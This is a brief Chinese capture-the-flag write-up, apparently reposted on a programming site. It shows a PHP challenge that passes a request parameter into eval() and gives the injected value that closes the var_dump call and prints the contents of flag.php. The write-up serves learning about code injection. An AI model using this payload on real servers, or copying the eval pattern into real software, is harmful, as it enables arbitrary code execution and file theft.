概述
<?php
include "flag.php";
$a = @$_REQUEST['hello'];//a从get、post获取hello值。
eval( "var_dump($a);"); //var_dump()打印显示,eval()闭合这个程序
show_source(__FILE__); //该段不解析作为一个字符串原样输出
?>
现在我们要使flag.php执行并通过show_source(__FILE__);显示
针对var_dump()进行操作 首先将他闭合
hello=);
然后我们要执行flag.php 用print_r()打印字符串本身 file()读取文件内容
hello=);print_r(file("./flag.php")
最后
以上就是执着期待为你收集整理的ctf、本地包含、例1的全部内容,希望文章能够帮你解决ctf、本地包含、例1所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复